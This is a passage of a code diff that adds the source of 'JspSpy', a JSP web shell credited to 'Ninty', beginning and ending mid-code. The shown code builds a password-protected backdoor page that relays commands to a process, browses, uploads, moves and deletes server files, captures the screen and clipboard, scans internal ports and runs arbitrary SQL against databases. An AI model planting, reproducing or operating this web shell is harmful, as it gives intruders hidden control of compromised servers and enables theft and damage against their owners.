+str = str.replace("&","&amp;").replace("<","&lt;").replace(">","&gt;");
+str = str.replace(""+(char)13+(char)10,"<br/>");
+str = str.replace("\n","<br/>");
+out.write(str.toCharArray(), 0, str.length());
+out.flush();
+}
+} else {
+//from client to exe
+while(true) {
+while(this.ol.getCmd() == null) {
+Thread.sleep(500);
+}
+if (this.ol.getCmd().equals("first")) {
+this.ol.setCmd(null);
+continue;
+}
+this.ol.setCmd(this.ol.getCmd() + (char)10);
+char[] arr = this.ol.getCmd().toCharArray();
+out.write(arr,0,arr.length);
+out.flush();
+this.ol.setCmd(null);
+}
+}
+} catch(Exception e){
+}
+try{
+if(in != null)
+in.close();
+if(out != null)
+out.close();
+} catch( Exception e ){
+}
+}
+}
+private static class Table{
+private ArrayList<Row> rows = null;
+private boolean echoTableTag = false;
+public void setEchoTableTag(boolean v) {
+this.echoTableTag = v;
+}
+public Table(){
+this.rows = new ArrayList<Row>();
+}
+public void addRow(Row r) {
+this.rows.add(r);
+}
+public String toString(){
+StringBuilder html = new StringBuilder();
+if (echoTableTag)
+html.append("<table>");
+for (Row r:rows) {
+html.append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">");
+for (Column c:r.getColumns()) {
+html.append("<td nowrap>");
+String vv = Util.htmlEncode(Util.getStr(c.getValue()));
+if (vv.equals(""))
+vv = "&nbsp;";
+html.append(vv);
+html.append("</td>");
+}
+html.append("</tr>");
+}
+if (echoTableTag)
+html.append("</table>");
+return html.toString();
+}
+}
+private static class Row{
+private ArrayList<Column> cols = null;
+public Row(){
+this.cols = new ArrayList<Column>();
+}
+public void addColumn(Column n) {
+this.cols.add(n);
+}
+public ArrayList<Column> getColumns(){
+return this.cols;
+}
+}
+private static class Column{
+private String value;
+public Column(String v){
+this.value = v;
+}
+public String getValue(){
+return this.value;
+}
+}
+private static class Util{
+public static boolean isEmpty(String s) {
+return s == null || s.trim().equals("");
+}
+public static boolean isEmpty(Object o) {
+return o == null || isEmpty(o.toString());
+}
+public static String getSize(long size,char danwei) {
+if (danwei == 'M') {
+double v =  formatNumber(size / 1024.0 / 1024.0,2);
+if (v > 1024) {
+return getSize(size,'G');
+}else {
+return v + "M";
+}
+} else if (danwei == 'G') {
+return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G";
+} else if (danwei == 'K') {
+double v = formatNumber(size / 1024.0,2);
+if (v > 1024) {
+return getSize(size,'M');
+} else {
+return v + "K";
+}
+} else if (danwei == 'B') {
+if (size > 1024) {
+return getSize(size,'K');
+}else {
+return size + "B";
+}
+}
+return ""+0+danwei;
+}
+public static double formatNumber(double value,int l) {
+NumberFormat format = NumberFormat.getInstance();
+format.setMaximumFractionDigits(l);
+format.setGroupingUsed(false);
+return new Double(format.format(value));
+}
+public static boolean isInteger(String v) {
+if (isEmpty(v))
+return false;
+return v.matches("^\\d+$");
+}
+public static String formatDate(long time) {
+SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss");
+return format.format(new java.util.Date(time));
+}
+public static String convertPath(String path) {
+return path != null ? path.replace("\\","/") : "";
+}
+public static String htmlEncode(String v) {
+if (isEmpty(v))
+return "";
+return v.replace("&","&amp;").replace("<","&lt;").replace(">","&gt;");
+}
+public static String getStr(String s) {
+return s == null ? "" :s;
+}
+public static String getStr(Object s) {
+return s == null ? "" :s.toString();
+}
+public static String exec(String regex, String str, int group) {
+Pattern pat = Pattern.compile(regex);
+Matcher m = pat.matcher(str);
+if (m.find())
+return m.group(group);
+return null;
+}
+public static void outMsg(Writer out,String msg) throws Exception {
+outMsg(out,msg,"center");
+}
+public static void outMsg(Writer out,String msg,String align) throws Exception {
+if (msg.indexOf("java.lang.ClassNotFoundException") != -1)
+msg = "Can Not Find The Driver!<br/>" + msg;
+out.write("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:"+align+";font-weight:bold;margin:10px\">"+msg+"</div>");
+}
+}
+private static class UploadBean {
+private String fileName = null;
+private String suffix = null;
+private String savePath = "";
+private ServletInputStream sis = null;
+private byte[] b = new byte[1024];
+public UploadBean() {
+}
+public void setSavePath(String path) {
+this.savePath = path;
+}
+public void parseRequest(HttpServletRequest request) throws IOException {
+sis = request.getInputStream();
+int a = 0;
+int k = 0;
+String s = "";
+while ((a = sis.readLine(b,0,b.length))!= -1) {
+s = new String(b, 0, a,PAGE_CHARSET);
+if ((k = s.indexOf("filename=\""))!= -1) {
+s = s.substring(k + 10);
+k = s.indexOf("\"");
+s = s.substring(0, k);
+File tF = new File(s);
+if (tF.isAbsolute()) {
+fileName = tF.getName();
+} else {
+fileName = s;
+}
+k = s.lastIndexOf(".");
+suffix = s.substring(k + 1);
+upload();
+}
+}
+}
+private void upload() {
+try {
+FileOutputStream out = new FileOutputStream(new File(savePath,fileName));
+int a = 0;
+int k = 0;
+String s = "";
+while ((a = sis.readLine(b,0,b.length))!=-1) {
+s = new String(b, 0, a);
+if ((k = s.indexOf("Content-Type:"))!=-1) {
+break;
+}
+}
+sis.readLine(b,0,b.length);
+while ((a = sis.readLine(b,0,b.length)) != -1) {
+s = new String(b, 0, a);
+if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) {
+break;
+}
+out.write(b, 0, a);
+}
+out.close();
+} catch (IOException ioe) {
+ioe.printStackTrace();
+}
+}
+}
+%>
+<%
+SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1);
+String myAbsolutePath = application.getRealPath(request.getServletPath());
+if (Util.isEmpty(myAbsolutePath)) {//for weblogic
+SHELL_NAME = request.getServletPath();
+myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString();
+SHELL_NAME=request.getContextPath()+SHELL_NAME;
+WEB_ROOT = new File(application.getResource("/").getPath()).toString();
+} else {
+WEB_ROOT = application.getRealPath("/");
+}
+SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator)));
+if (session.getAttribute(CURRENT_DIR) == null)
+session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR));
+request = new MyRequest(request);
+if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) {
+String o = request.getParameter("o");
+if (o != null &&  o.equals("login")) {
+ins.get("login").invoke(request,response,session);
+return;
+} else if (o != null && o.equals("vLogin")) {
+ins.get("vLogin").invoke(request,response,session);
+return;
+} else {
+response.sendRedirect(SHELL_NAME+"?o=vLogin");
+return;
+}
+}
+%>
+<%!
+private static interface Invoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception;
+public boolean doBefore();
+public boolean doAfter();
+}
+private static class DefaultInvoker implements Invoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception {
+}
+public boolean doBefore(){
+return true;
+}
+public boolean doAfter() {
+return true;
+}
+}
+private static class ScriptInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<script type=\"text/javascript\">"+
+"	String.prototype.trim = function(){return this.replace(/^\\s+|\\s+$/,'');};"+
+"	function fso(obj) {"+
+"		this.currentDir = '"+JSession.getAttribute(CURRENT_DIR)+"';"+
+"		this.filename = obj.filename;"+
+"		this.path = obj.path;"+
+"		this.filetype = obj.filetype;"+
+"	};"+
+"	fso.prototype = {"+
+"		copy:function(){"+
+"			var path = prompt('Copy To : ',this.path);"+
+"			if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"+
+"			doPost({o:'copy',src:this.path,to:path});"+
+"		},"+
+"		move:function() {"+
+"			var path =prompt('Move To : ',this.path);"+
+"			if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"+
+"			doPost({o:'move',src:this.path,to:path})"+
+"		},"+
+"		vEdit:function() {"+
+"			doPost({o:'vEdit',filepath:this.path})"+
+"		},"+
+"		down:function() {"+
+"			doPost({o:'down',path:this.path})"+
+"		},"+
+"		removedir:function() {"+
+"			if (!confirm('Dangerous ! Are You Sure To Delete '+this.filename+'?'))return;"+
+"			doPost({o:'removedir',dir:this.path});"+
+"		},"+
+"		mkdir:function() {"+
+"			var name = prompt('Input New Directory Name','');"+
+"			if (name == null || name.trim().length == 0)return;"+
+"			doPost({o:'mkdir',name:name});"+
+"		},"+
+"		subdir:function() {"+
+"			doPost({o:'filelist',folder:this.path})"+
+"		},"+
+"		parent:function() {"+
+"			var parent=(this.path.substr(0,this.path.lastIndexOf(\"/\")))+'/';"+
+"			doPost({o:'filelist',folder:parent})"+
+"		},"+
+"		createFile:function() {"+
+"			var path = prompt('Input New File Name','');"+
+"			if (path == null || path.trim().length == 0) return;"+
+"			doPost({o:'vCreateFile',filepath:path})"+
+"		},"+
+"		deleteBatch:function() {"+
+"			if (!confirm('Are You Sure To Delete These Files?')) return;"+
+"			var selected = new Array();"+
+"			var inputs = document.getElementsByTagName('input');"+
+"			for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"+
+"			if (selected.length == 0) {alert('No File Selected');return;}"+
+"			doPost({o:'deleteBatch',files:selected.join(',')})"+
+"		},"+
+"		packBatch:function() {"+
+"			var selected = new Array();"+
+"			var inputs = document.getElementsByTagName('input');"+
+"			for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"+
+"			if (selected.length == 0) {alert('No File Selected');return;}"+
+"			var savefilename = prompt('Input Target File Name(Only Support ZIP)','pack.zip');"+
+"			if (savefilename == null || savefilename.trim().length == 0)return;"+
+"			doPost({o:'packBatch',files:selected.join(','),savefilename:savefilename})"+
+"		},"+
+"		pack:function() {"+
+"			var tmpName = '';"+
+"			if (this.filename.indexOf('.') == -1) tmpName = this.filename;"+
+"			else tmpName = this.filename.substr(0,this.filename.lastIndexOf('.'));"+
+"			tmpName += '.zip';"+
+"			var path = this.path;"+
+"			var name = prompt('Input Target File Name (Only Support Zip)',tmpName);"+
+"			if (name == null || path.trim().length == 0) return;"+
+"			doPost({o:'pack',packedfile:path,savefilename:name})"+
+"		},"+
+"		vEditProperty:function() {"+
+"			var path = this.path;"+
+"			doPost({o:'vEditProperty',filepath:path})"+
+"		},"+
+"		unpack:function() {"+
+"			var path = prompt('unpack to : ',this.currentDir+'/'+this.filename.substr(0,this.filename.lastIndexOf('.')));"+
+"			if (path == null || path.trim().length == 0) return;"+
+"			doPost({o:'unpack',savepath:path,zipfile:this.path})"+
+"		}"+
+"	};"+
+"	function doPost(obj) {"+
+"		var form = document.forms[\"doForm\"];"+
+"		var elements = form.elements;for (var i = form.length - 1;i>=0;i--){form.removeChild(elements[i])}"+
+"		for (var pro in obj)"+
+"		{"+
+"			var input = document.createElement(\"input\");"+
+"			input.type = \"hidden\";"+
+"			input.name = pro;"+
+"			input.value = obj[pro];"+
+"			form.appendChild(input);"+
+"		}"+
+"		form.submit();"+
+"	}"+
+"</script>");	
+
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class BeforeInvoker extends  DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<html><head><title>JspSpy Codz By - Ninty</title><style type=\"text/css\">"+
+"body,td{font: 12px Arial,Tahoma;line-height: 16px;}"+
+".input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}"+
+".area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}"+
+".bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}"+
+"a {color: #00f;text-decoration:underline;}"+
+"a:hover{color: #f00;text-decoration:none;}"+
+".alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}"+
+".alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}"+
+".focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}"+
+".head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}"+
+".head td span{font-weight:normal;}"+
+"form{margin:0;padding:0;}"+
+"h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}"+
+"ul.info li{margin:0;color:#444;line-height:24px;height:24px;}"+
+"u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}"+
+".secho{height:400px;width:100%;overflow:auto;border:none}"+
+"</style></head><body style=\"margin:0;table-layout:fixed; word-break:break-all\">");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class AfterInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("</body></html>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class DeleteBatchInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String files = request.getParameter("files");
+if (!Util.isEmpty(files)) {
+String currentDir = JSession.getAttribute(CURRENT_DIR).toString();
+String[] arr = files.split(",");
+for (String fs:arr) {
+File f = new File(currentDir,fs);
+f.delete();
+}
+}
+JSession.setAttribute(MSG,"Delete Files Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class ClipBoardInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td>"+
+"        <h2>System Clipboard &raquo;</h2>"+
+"<p><pre>");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("</pre>"+
+"          <input class=\"bt\" name=\"button\" id=\"button\" onClick=\"history.back()\" value=\"Back\" type=\"button\" size=\"100\"  />"+
+"        </p>"+
+"      </td>"+
+"  </tr>"+
+"</table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VRemoteControlInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<script type=\"text/javascript\">"+
+"	var interval = null;"+
+"	function a(btn) {"+
+"		if (btn.value == \"Stop\")"+
+"		{"+
+"			sstopClick(btn);"+
+"		} else {"+
+"			startClick(btn);"+
+"		}"+
+"	}"+
+"	function startClick(btn){"+
+"		btn.value = \"Stop\";"+
+"		var pl = document.getElementById(\"pl\").value;"+
+"		interval = setInterval(function(){"+
+"			var img = document.getElementById(\"screen\");"+
+"			img.src = \""+SHELL_NAME+"?o=gc&rnd=\"+Math.random();"+
+"		},parseInt(pl)*1000);"+
+"	}"+
+"	function sstopClick(btn) {"+
+"		clearInterval(interval);"+
+"		btn.value = \"Start\";"+
+"	}"+
+"  </script>");
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td>"+
+"        <h2>Remote Control &raquo;</h2><input class=\"bt\" onclick=\"var img = document.getElementById('screen').src='"+SHELL_NAME+"?o=gc&rnd='+Math.random();\" name=\"getsc\" id=\"getsc\" value=\"Get Screen\" type=\"button\" size=\"100\"  />"+
+"          <input class=\"bt\" name=\"button\" id=\"button\" onClick=\"a(this)\" value=\"Start\" type=\"button\" size=\"100\"  /> Speed(Second , dont be so fast)  <input type='text' value='3' size='5' id='pl' name='pl'/>  Can Not Control Yet."+
+"        <hr/><p><img id='screen' src='x'/></p>"+
+"      </td>"+
+"  </tr>"+
+"</table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//GetScreen
+private static class GcInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+Dimension size = Toolkit.getDefaultToolkit().getScreenSize();
+Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight());
+BufferedImage img = new Robot().createScreenCapture(rec);
+response.setContentType("image/jpeg");
+ImageIO.write(img,"jpg",response.getOutputStream());
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VPortScanInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String ip = request.getParameter("ip");
+String ports = request.getParameter("ports");
+String timeout = request.getParameter("timeout");
+if (Util.isEmpty(ip))
+ip = "127.0.0.1";
+if (Util.isEmpty(ports))
+ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500";
+if (Util.isEmpty(timeout)) 
+timeout = "2";
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<h2 id=\"Bin_H2_Title\">PortScan &gt;&gt;</h2>"+
+"<div id=\"YwLB\"><form action=\""+SHELL_NAME+"\" method=\"post\">"+
+"<p><input type=\"hidden\" value=\"portScan\" name=\"o\">"+
+"IP : <input name=\"ip\" type=\"text\" value=\""+ip+"\" id=\"ip\" class=\"input\" style=\"width:10%;margin:0 8px;\" /> Port : <input name=\"ports\" type=\"text\" value=\""+ports+"\" id=\"ports\" class=\"input\" style=\"width:40%;margin:0 8px;\" /> Timeout 锛堢锛� : <input name=\"timeout\" type=\"text\" value=\""+timeout+"\" id=\"timeout\" class=\"input\" size=\"5\" style=\"margin:0 8px;\" /> <input type=\"submit\" name=\"submit\" value=\"Scan\" id=\"submit\" class=\"bt\" />"+
+"</p>"+
+"</form></div>"+
+"</td></tr></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class PortScanInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+ins.get("vPortScan").invoke(request,response,JSession);
+String ip = request.getParameter("ip");
+String ports = request.getParameter("ports");
+String timeout = request.getParameter("timeout");
+int iTimeout = 0;
+if (Util.isEmpty(ip) || Util.isEmpty(ports))
+return;
+if (!Util.isInteger(timeout)) {
+timeout = "2";
+}
+iTimeout = Integer.parseInt(timeout);
+Map<String,String> rs = new LinkedHashMap<String,String>();
+String[] portArr = ports.split(",");
+for (String port:portArr) {
+try {
+Socket s = new Socket();
+s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout);
+s.close();
+rs.put(port,"Open");
+} catch (Exception e) {
+rs.put(port,"Close");
+}
+}
+out.println("<div style='margin:10px'>");
+Set<Map.Entry<String,String>> entrySet = rs.entrySet();
+for (Map.Entry<String,String> e:entrySet) {
+String port = e.getKey();
+String value = e.getValue();
+out.println(ip+" : "+port+" ................................. <font color="+(value.equals("Open")?"green":"red")+"><b>"+value+"</b></font><br>");
+}
+out.println("</div>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VConnInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+Object obj = JSession.getAttribute(DBO);
+if (obj == null || !((DBOperator)obj).isValid()) {
+out.println("  <script type=\"text/javascript\">"+
+"	function changeurldriver(){"+
+"		var form = document.forms[\"form1\"];"+
+"		var v = form.elements[\"db\"].value;"+
+"		form.elements[\"url\"].value = v.split(\"`\")[1];"+
+"		form.elements[\"driver\"].value = v.split(\"`\")[0];"+
+"		form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"+
+"	}"+
+"  </script>");
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\"0\">"+
+"<h2>DataBase Manager &raquo;</h2>"+
+"<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"+
+"<p>"+
+"Driver:"+
+"  <input class=\"input\" name=\"driver\" id=\"driver\" type=\"text\" size=\"35\"  />"+
+"URL:"+
+"<input class=\"input\" name=\"url\" id=\"url\" value=\"\" type=\"text\" size=\"90\"  />"+
+"UID:"+
+"<input class=\"input\" name=\"uid\" id=\"uid\" value=\"\" type=\"text\" size=\"10\"  />"+
+"PWD:"+
+"<input class=\"input\" name=\"pwd\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\"  />"+
+"DataBase:"+
+" <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"+
+" <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"+
+" <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"+
+" <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"+
+" <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:\\ninty.mdb'>Access</option>"+
+" <option value=' ` '>Other</option>"+
+" </select>"+
+"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form></table><script>changeurldriver()</script>");
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//DBConnect
+private static class DbcInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String driver = request.getParameter("driver");
+String url = request.getParameter("url");
+String uid = request.getParameter("uid");
+String pwd = request.getParameter("pwd");
+String sql = request.getParameter("sql");
+String selectDb = request.getParameter("selectDb");
+if (selectDb == null)
+selectDb = JSession.getAttribute("selectDb").toString();
+else
+JSession.setAttribute("selectDb",selectDb);
+Object dbo = JSession.getAttribute(DBO);
+if (dbo == null || !((DBOperator)dbo).isValid()) {
+if (dbo != null)
+((DBOperator)dbo).close();
+dbo = new DBOperator(driver,url,uid,pwd,true);
+} else {
+if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) {
+DBOperator oldDbo = (DBOperator)dbo;
+dbo = new DBOperator(driver,url,uid,pwd);
+if (!oldDbo.equals(dbo)) {
+((DBOperator)oldDbo).close();
+((DBOperator)dbo).connect();
+} else {
+dbo = oldDbo;
+}
+}
+} 
+DBOperator Ddbo = (DBOperator)dbo;
+JSession.setAttribute(DBO,Ddbo);
+Util.outMsg(out,"Connect To DataBase Success!");
+out.println("  <script type=\"text/javascript\">"+
+"	function changeurldriver(selectDb){"+
+"		var form = document.forms[\"form1\"];"+
+"		if (selectDb){"+
+"			form.elements[\"db\"].selectedIndex = selectDb"+
+"		}"+
+"		var v = form.elements[\"db\"].value;"+
+"		form.elements[\"url\"].value = v.split(\"`\")[1];"+
+"		form.elements[\"driver\"].value = v.split(\"`\")[0];"+
+"		form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"+
+"	}"+
+"  </script>");
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\""+selectDb+"\">"+
+"<h2>DataBase Manager &raquo;</h2>"+
+"<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"+
+"<p>"+
+"Driver:"+
+"  <input class=\"input\" name=\"driver\" value=\""+Ddbo.driver+"\" id=\"driver\" type=\"text\" size=\"35\"  />"+
+"URL:"+
+"<input class=\"input\" name=\"url\" value=\""+Ddbo.url+"\" id=\"url\" value=\"\" type=\"text\" size=\"90\"  />"+
+"UID:"+
+"<input class=\"input\" name=\"uid\" value=\""+Ddbo.uid+"\" id=\"uid\" value=\"\" type=\"text\" size=\"10\"  />"+
+"PWD:"+
+"<input class=\"input\" name=\"pwd\" value=\""+Ddbo.pwd+"\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\"  />"+
+"DataBase:"+
+" <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"+
+" <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"+
+" <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"+
+" <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"+
+" <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:/ninty.mdb'>Access</option>"+
+" <option value=' ` '>Other</option>"+
+" </select>"+
+"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form><script>changeurldriver('"+selectDb+"')</script>");
+out.println("<form action=\""+SHELL_NAME+"\" method=\"POST\">"+
+"<p><input type=\"hidden\" name=\"selectDb\" value=\""+selectDb+"\"><input type=\"hidden\" name=\"o\" value=\"executesql\"><table width=\"200\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td colspan=\"2\">Run SQL query/queries on database :</td></tr><tr><td><textarea name=\"sql\" class=\"area\" style=\"width:600px;height:50px;overflow:auto;\">"+Util.htmlEncode(Util.getStr(sql))+"</textarea></td><td style=\"padding:0 5px;\"><input class=\"bt\" style=\"height:50px;\" name=\"submit\" type=\"submit\" value=\"Query\" /></td></tr></table></p></form></table>");	
+} catch (Exception e) {
+//e.printStackTrace();
+throw e;
+}
+}
+}
+private static class ExecuteSQLInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String sql = request.getParameter("sql");
+String db = request.getParameter("selectDb");
+Object dbo = JSession.getAttribute(DBO);
+if (!Util.isEmpty(sql)) {
+if (dbo == null || !((DBOperator)dbo).isValid()) {
+response.sendRedirect(SHELL_NAME+"?o=vConn");
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+Object obj = ((DBOperator)dbo).execute(sql);
+if (obj instanceof ResultSet) {
+ResultSet rs = (ResultSet)obj;
+ResultSetMetaData meta = rs.getMetaData();
+int colCount = meta.getColumnCount();
+out.println("<div style='padding:10px'><p><b>Query#0 : "+Util.htmlEncode(sql)+"</b></p>");
+out.println("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\"><tr class=\"head\">");
+for (int i=1;i<=colCount;i++) {
+out.println("<td nowrap>"+meta.getColumnName(i)+"<br><span>"+meta.getColumnTypeName(i)+"</span></td>");
+}
+out.println("</tr>");
+Table tb = new Table();
+while(rs.next()) {
+Row r = new Row();
+for (int i = 1;i<=colCount;i++) {
+r.addColumn(new Column(rs.getString(i)));
+}
+tb.addRow(r);
+}
+out.println(tb.toString());
+out.println("</table></div>");
+rs.close();
+((DBOperator)dbo).closeStmt();
+} else {
+out.println("<div style='margin:10px'><h2>affected rows : <b>"+obj+"</b></h2></div>");
+}
+}
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VLoginInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<style type=\"text/css\">"+
+"	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}"+
+"a{font:11px Verdana;BACKGROUND: #FFFFFF;}"+
+"	</style><form method=\"POST\" action=\""+SHELL_NAME+"\">"+
+"	  <p><span style=\"font:11px Verdana;\">Password: </span>"+
+"        <input name=\"o\" type=\"hidden\" value=\"login\">"+
+"        <input name=\"pw\" type=\"password\" size=\"20\">"+
+"        <input type=\"hidden\" name=\"o\" value=\"login\">"+
+"        <input type=\"submit\" value=\"Login\"><br/><br/>"+
+"	  "+
+"<span style=\"font:11px Verdana;\">Copyright &copy; 2009 NinTy </span><a href=\"http://www.forjj.com\" target=\"_blank\">www.Forjj.com</a></p>"+
+"    </form>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class LoginInvoker extends DefaultInvoker{
+public boolean doBefore() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String inputPw = request.getParameter("pw");
+if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) {
+response.sendRedirect(SHELL_NAME+"?o=vLogin");
+return;
+} else {
